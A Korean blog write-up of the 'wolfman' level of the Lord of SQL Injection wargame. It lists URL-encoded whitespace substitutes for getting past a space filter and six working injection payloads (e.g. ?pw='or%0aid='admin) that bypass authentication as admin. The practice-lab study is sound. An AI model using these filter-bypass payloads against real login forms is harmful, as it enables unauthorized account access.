-
|Lord of SQL_injection| #5 WolfmanWargame Site/SQL injection 2019. 2. 8. 14:48
오늘은 두 문제 정도만 풀어볼까아 ~
첫줄의 마지막 문제이다 ~~
5단계 문제 wolfman 이다. No whitespace 라는 문구를 봐도 알 수 있는 것처럼, 공백을 막고 있다. 최종적으로 id 에 admin 이 들어가면 문제는 해결된다. 대표적으로 공백을 우회하는 방법으로는 %0a (줄바꿈), %09 (tab) 가 있고, 그 외에도 %0b, %0c, %0d, /**/ 등이 있다. 공백 우회만 해결된다면 정말 쉬운 문제가 될 것이다.
짜잔!!
?pw='or%0aid='admin
?pw='or%0bid='admin
?pw='or%09id='admin
?pw='or%0did='admin
?pw='or/**/id='admin
?pw='or(id='admin')%23
한 문제 한 문제마다 테마가 있어서 공부하기 좋은 것 같다.
2번째 줄로 가보자 ~~ PASS
'Wargame Site > SQL injection' 카테고리의 다른 글
|Lord of SQL_injection| #7 Orge (0) 2019.02.08 |Lord of SQL_injection| #6 Darkelf (0) 2019.02.08 |Lord of SQL_injection| #4 Orc (0) 2019.02.07 |Lord of SQL_injection| #3 Goblin (0) 2019.02.07 |Lord of SQL_injection| #2 Cobolt (0) 2019.02.06 댓글
